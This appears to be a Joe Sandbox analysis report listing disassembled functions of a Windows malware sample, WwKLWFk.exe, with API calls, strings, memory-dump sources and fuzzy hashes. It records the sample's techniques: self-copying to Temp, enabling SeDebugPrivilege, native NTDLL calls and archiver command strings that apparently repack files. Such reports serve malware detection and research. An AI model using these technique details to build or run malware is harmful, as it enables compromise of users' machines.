API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 0ba8453472ceac8cd19ca8d308cb9cc589601ae945e2eef09b8f5e371304bb58
Instruction ID: dfffbd43de992a2fd8ece62b77efd0a71b962b00890cf02e642ae6bee9b5ec61
Opcode Fuzzy Hash: 0ba8453472ceac8cd19ca8d308cb9cc589601ae945e2eef09b8f5e371304bb58
Instruction Fuzzy Hash: E221C6B180138CAFE721AF649C84FAE7BEDFB0675AB140595FC4293151D7208D4ACB60

Function 00B52C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00B52C57

Part of subcall function 00B51973: PathFileExistsA.KERNELBASE(00B54E54,77068400,00000000), ref: 00B51992
Part of subcall function 00B51973: CreateFileA.KERNELBASE(00B54E54,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B519BA
Part of subcall function 00B51973: Sleep.KERNEL32(00000064), ref: 00B519C6
Part of subcall function 00B51973: wsprintfA.USER32 ref: 00B519EC
Part of subcall function 00B51973: CopyFileA.KERNEL32(00B54E54,?,00000000), ref: 00B51A00
Part of subcall function 00B51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B51A1E
Part of subcall function 00B51973: GetFileSize.KERNEL32(00B54E54,00000000), ref: 00B51A2C
Part of subcall function 00B51973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00B51A46
Part of subcall function 00B51973: ReadFile.KERNELBASE(00B54E54,00B54E58,00000000,?,00000000), ref: 00B51A65

CreateThread.KERNELBASE(00000000,00000000,00B52B8C,00000000,00000000,00000000), ref: 00B52C99
WaitForMultipleObjects.KERNEL32(00000001,00B516BA,00000001,000000FF,?,00B516BA,00000000), ref: 00B52CAC
VirtualFree.KERNELBASE(00970000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00B54E5C,00B54E60,?,00B516BA,00000000), ref: 00B52CC2

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B52C69

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
API String ID: 2042498389-2197398117
Opcode ID: 7c38ea08ae22e1364fbef650c1f17d103829daa07355cbe54482badd22b2c354
Instruction ID: 75c7339f9443f22a7333eca1b262f9f86a472f3e525777941896f8d7ed2e6e0e
Opcode Fuzzy Hash: 7c38ea08ae22e1364fbef650c1f17d103829daa07355cbe54482badd22b2c354
Instruction Fuzzy Hash: 5F0171716423207AD61497959C0AFDF7EECEF02B66F5441D0BD05E62D2DAA09988C7A0

Function 00B52845 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5274A: memset.MSVCRT ref: 00B52766
Part of subcall function 00B5274A: memset.MSVCRT ref: 00B52774
Part of subcall function 00B5274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00B52787
Part of subcall function 00B5274A: wsprintfA.USER32 ref: 00B527AB
Part of subcall function 00B5274A: wsprintfA.USER32 ref: 00B527C6
Part of subcall function 00B5274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\50ed6d56.exe,00000000), ref: 00B527D4
Part of subcall function 00B5274A: wsprintfA.USER32 ref: 00B527F4
Part of subcall function 00B5274A: DeleteFileA.KERNEL32(?,?,00B54E54,00B54E58), ref: 00B5281A
Part of subcall function 00B5274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00B54E54,00B54E58), ref: 00B52832

DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B5287D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00B52894
CloseHandle.KERNEL32(FFFFFFFF), ref: 00B528A5

Part of subcall function 00B52692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00B52873,?,00000002), ref: 00B526A7
Part of subcall function 00B52692: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00B52873,?,00000002), ref: 00B526B5
Part of subcall function 00B52692: lstrlen.KERNEL32(?), ref: 00B526C4
Part of subcall function 00B52692: ??2@YAPAXI@Z.MSVCRT ref: 00B526CE
Part of subcall function 00B52692: lstrcpy.KERNEL32(00000004,?), ref: 00B526E3
Part of subcall function 00B52692: SetEvent.KERNEL32 ref: 00B5273C

Strings

C:\Users\user\AppData\Local\Temp\50ed6d56.exe, xrefs: 00B52878

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
String ID: C:\Users\user\AppData\Local\Temp\50ed6d56.exe
API String ID: 2533558932-81216859
Opcode ID: 6735bfa1a392ac6892e245287df8408b6d3c19170ac52a22ebe4a45b311a5ddf
Instruction ID: 15e1d78decd5f6c7c58f74acecc036e8e22c137a8f056cbc95a92462c4118f8e
Opcode Fuzzy Hash: 6735bfa1a392ac6892e245287df8408b6d3c19170ac52a22ebe4a45b311a5ddf
Instruction Fuzzy Hash: D9F03A746413046BD720A7B4AD8BB5A33ECAB12747F1805E0BA15E31E0EFB8D98D8E55

Function 00B514E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00B51504
VirtualQuery.KERNEL32(00B514E1,?,0000001C), ref: 00B51525
ExitProcess.KERNEL32 ref: 00B5157A

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 42b0aaae3097e1424321bfa8d12490fb6f7b387d17ebc4fd3c65d9e47e62fc99
Instruction ID: f4de591dfdbcc4bd39d064ee357271aa394594d1aa371cc94731055114df2f1b
Opcode Fuzzy Hash: 42b0aaae3097e1424321bfa8d12490fb6f7b387d17ebc4fd3c65d9e47e62fc99
Instruction Fuzzy Hash: 2C114C71900304DFCB51DFADB885B7977F8EB94757B1044FAE80297290EB708D859B50

Function 00B56159 Relevance: 2.6, APIs: 2, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00B560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B56189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B561A5

Memory Dump Source

Source File: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: bc25ba6ea4966d266aee93051df030cdaa3f870f6815e597889d202831388974
Instruction ID: 5e960f7d9f113b9773dc892eb5a98a1b7c3abf76f494900dceba221875ec2e4b
Opcode Fuzzy Hash: bc25ba6ea4966d266aee93051df030cdaa3f870f6815e597889d202831388974
Instruction Fuzzy Hash: 1F115B31A00649CFCB318F58CC817ED77E1EF45302FA94099DE89AB291DA722948CB94

Non-executed Functions

Function 00B5119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,00B513EF), ref: 00B511AB
OpenProcessToken.ADVAPI32(00000000,00000028,00B513EF,?,?,?,?,?,?,00B513EF), ref: 00B511BB
AdjustTokenPrivileges.ADVAPI32(00B513EF,00000000,?,00000010,00000000,00000000), ref: 00B511EB
CloseHandle.KERNEL32(00B513EF), ref: 00B511FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B513EF), ref: 00B51203

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B511A5

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
API String ID: 75692138-2197398117
Opcode ID: b7cb8c8e2535d0e04acedae1f21c1f4775560a9c71f146d4458643ede5c7c2bf
Instruction ID: 8f5da148ce2177ffa6b62f664bd34063b93e5fe1b59ef650316ce02b355ffab7
Opcode Fuzzy Hash: b7cb8c8e2535d0e04acedae1f21c1f4775560a9c71f146d4458643ede5c7c2bf
Instruction Fuzzy Hash: D001E875900309EFDB01DFD4CD89BAEBBF8FB04746F5044A9E605A2290DB715F449B50

Function 00B5239D Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00B523CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B52464
GetFileSize.KERNEL32(00000000,00000000), ref: 00B52472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00B524A8
memset.MSVCRT ref: 00B524B9
strrchr.MSVCRT ref: 00B524C9
wsprintfA.USER32 ref: 00B524DE
strrchr.MSVCRT ref: 00B524ED
memset.MSVCRT ref: 00B524F2
memset.MSVCRT ref: 00B52505
wsprintfA.USER32 ref: 00B52524
Sleep.KERNEL32(000007D0), ref: 00B52535
Sleep.KERNEL32(000007D0), ref: 00B5255D
memset.MSVCRT ref: 00B5256E
wsprintfA.USER32 ref: 00B52585
memset.MSVCRT ref: 00B525A6
wsprintfA.USER32 ref: 00B525CA
Sleep.KERNEL32(000007D0), ref: 00B525D0
Sleep.KERNEL32(000007D0,?,?), ref: 00B525E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B525FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00B52611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00B52642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00B5265B
SetEndOfFile.KERNEL32 ref: 00B5266D
CloseHandle.KERNEL32(00000000), ref: 00B52676
RemoveDirectoryA.KERNEL32(?), ref: 00B52681

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00B523B1, 00B523B6, 00B524CD
C:\Users\user\AppData\Local\Temp\50ed6d56.exe, xrefs: 00B52519, 00B525BF
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00B525C4
%s\, xrefs: 00B5257F
%s X -ibck "%s" "%s\", xrefs: 00B5251E
%s%s, xrefs: 00B524D8
-ibck, xrefs: 00B525BA

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\50ed6d56.exe
API String ID: 2203340711-1654081795
Opcode ID: 655ed721fa370343e1617687abfd6e6a0bbb5f94734b8b4de1fb9da75467e862
Instruction ID: 494f49fc4965c69c31766b4862422156cf722fe1277b3903422e4a1914db78e3
Opcode Fuzzy Hash: 655ed721fa370343e1617687abfd6e6a0bbb5f94734b8b4de1fb9da75467e862
Instruction Fuzzy Hash: D281C271504344BBD7109F60DC85FABB7ECEB89B46F04059AFA44D32A0DB70DA4D8B66

Function 00B5120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00B51400), ref: 00B51226
GetProcAddress.KERNEL32(00000000), ref: 00B5122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00B51400), ref: 00B5123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00B51400), ref: 00B51250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00B51400), ref: 00B5129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00B51400), ref: 00B512B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,00B51400), ref: 00B512F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00B51400), ref: 00B5130A

Strings

ntdll.dll, xrefs: 00B51219
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B51262
ZwQuerySystemInformation, xrefs: 00B51212

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-191650490
Opcode ID: ea66a4563450c8e9059b8acfbeaaf3bf992da5d83446b5b9950a18d98844c73b
Instruction ID: f53a0158390baed532cb26a6acdd2c86587c43a518cadeda2df4afac0f58d3a5
Opcode Fuzzy Hash: ea66a4563450c8e9059b8acfbeaaf3bf992da5d83446b5b9950a18d98844c73b
Instruction Fuzzy Hash: 8221F571605351ABD7209B69CC08B6BBAE8FB85F42F040DD8FA45E7280CB71DA49C7A5

Function 00B52692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00B52873,?,00000002), ref: 00B526A7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00B52873,?,00000002), ref: 00B526B5
lstrlen.KERNEL32(?), ref: 00B526C4
??2@YAPAXI@Z.MSVCRT ref: 00B526CE
lstrcpy.KERNEL32(00000004,?), ref: 00B526E3
lstrcpy.KERNEL32(?,00000004), ref: 00B5271F
??3@YAXPAX@Z.MSVCRT ref: 00B5272D
SetEvent.KERNEL32 ref: 00B5273C

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: f52893f554d1ef1c04b56d31524ff5c767660b139fe0224db209d5120b08fd3e
Instruction ID: de1195b1390054aba91248617892e50128e9bddc693d937a10ef1049829bebf3
Opcode Fuzzy Hash: f52893f554d1ef1c04b56d31524ff5c767660b139fe0224db209d5120b08fd3e
Instruction Fuzzy Hash: 90117C36501300AFCB22AF15EC48B6A7BF9FB9AB67B1440E5F85487260DB308D89DB50

Function 00B51B8A Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00B51BCD
rand.MSVCRT ref: 00B51BD8
memset.MSVCRT ref: 00B51C43
memcpy.MSVCRT ref: 00B51C4F
lstrcat.KERNEL32(?,.exe), ref: 00B51C5D

Strings

.exe, xrefs: 00B51C57

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe
API String ID: 122620767-4119554291
Opcode ID: 8544ff02f8de08041b64c50fc4059bcd0d9b0175515692747178af2674bb0c88
Instruction ID: 852645498af85ed2283f5abc5019a77cb2f6465dcf46b7d39e4afd465a134d4b
Opcode Fuzzy Hash: 8544ff02f8de08041b64c50fc4059bcd0d9b0175515692747178af2674bb0c88
Instruction Fuzzy Hash: D4213B32E453906EE226133E6C41B693BD4CFA3B27F1A44E9FD851B2E2D6640DCDC261

Function 00B5189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B518B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,774D0F00,77068400), ref: 00B518D3
CloseHandle.KERNEL32(00B52549), ref: 00B518E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B518F0
GetExitCodeProcess.KERNEL32(?,00B52549), ref: 00B51901
CloseHandle.KERNEL32(?), ref: 00B5190A

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: ece3514bf6c8d62465becd234b9a049d8fabbe2dd03481496dff11bdc10aa9d9
Instruction ID: 133d8b92484eae835f048a6119fe3d2d2e8ce936a5a6f3161d83c3344a64c1b3
Opcode Fuzzy Hash: ece3514bf6c8d62465becd234b9a049d8fabbe2dd03481496dff11bdc10aa9d9
Instruction Fuzzy Hash: 1C01B132901228BBCB216B95DC08FDFBFBDEF85761F004061FA15A21A0C6314A18CAA0

Function 00B5139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B513BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B513DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B51448

Part of subcall function 00B5119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,?,?,?,?,?,?,00B513EF), ref: 00B511AB
Part of subcall function 00B5119F: OpenProcessToken.ADVAPI32(00000000,00000028,00B513EF,?,?,?,?,?,?,00B513EF), ref: 00B511BB
Part of subcall function 00B5119F: AdjustTokenPrivileges.ADVAPI32(00B513EF,00000000,?,00000010,00000000,00000000), ref: 00B511EB
Part of subcall function 00B5119F: CloseHandle.KERNEL32(00B513EF), ref: 00B511FA
Part of subcall function 00B5119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B513EF), ref: 00B51203

Strings

C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B513A8
SeDebugPrivilege, xrefs: 00B513D3

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SeDebugPrivilege
API String ID: 4123949106-3284628267
Opcode ID: 9a646c9b637a2a96155f07058a7f780b0114410ea7c3aa1676d9ee8a78f30bad
Instruction ID: 9be9ee02f6414c288f51815bfa249e5af825cf56b2eb9152af1ca68f2eeb55c2
Opcode Fuzzy Hash: 9a646c9b637a2a96155f07058a7f780b0114410ea7c3aa1676d9ee8a78f30bad
Instruction Fuzzy Hash: E9311071D40209AAEF209BA9CC55FEEBBF8EB44706F1445E9E904B2241D6709E49CF60

Function 00B51319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00B51334
GetProcAddress.KERNEL32(00000000), ref: 00B5133B
memset.MSVCRT ref: 00B51359

Strings

ntdll.dll, xrefs: 00B5132F
NtSystemDebugControl, xrefs: 00B5132A

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: b490b44b3aa50ed2bdd67c390f0ac0e257f3b5ba848c22826a4787a0efd299ac
Instruction ID: b0620fdfa69a00e54e3e9c06f6b762ee501e4adbbd38cf55a95fe781e5fce4c0
Opcode Fuzzy Hash: b490b44b3aa50ed2bdd67c390f0ac0e257f3b5ba848c22826a4787a0efd299ac
Instruction Fuzzy Hash: 0F01617160030DBFDB10DFA8AC85B6FBBE8FB41716F0045EAFD01A2150D7708659CA55

Function 00B51DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00B51E0B
lstrcpy.KERNEL32(?,00000001), ref: 00B51E1C
strrchr.MSVCRT ref: 00B51E2B
lstrcmpiA.KERNEL32(?,00B54488), ref: 00B51E48
lstrlen.KERNEL32(00B54488), ref: 00B51E53

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 5cf502b140049d2805811aa6c33730dfbd1fe70d63e1cc47247eb5e7f3f96188
Instruction ID: 4c3eb15befc3887ce3964301f86e14238228fc7f9d54779d4e444320b4540c8e
Opcode Fuzzy Hash: 5cf502b140049d2805811aa6c33730dfbd1fe70d63e1cc47247eb5e7f3f96188
Instruction Fuzzy Hash: 4201D6B29043196FEB215764EC49BD777DCDB04356F0404E6EE45E31D0EFB49A898BA0

Function 00B5185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,77068400,00000000,?,?,?,00B527B5), ref: 00B51867
srand.MSVCRT ref: 00B51878
rand.MSVCRT ref: 00B51880
srand.MSVCRT ref: 00B51890
rand.MSVCRT ref: 00B51894

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

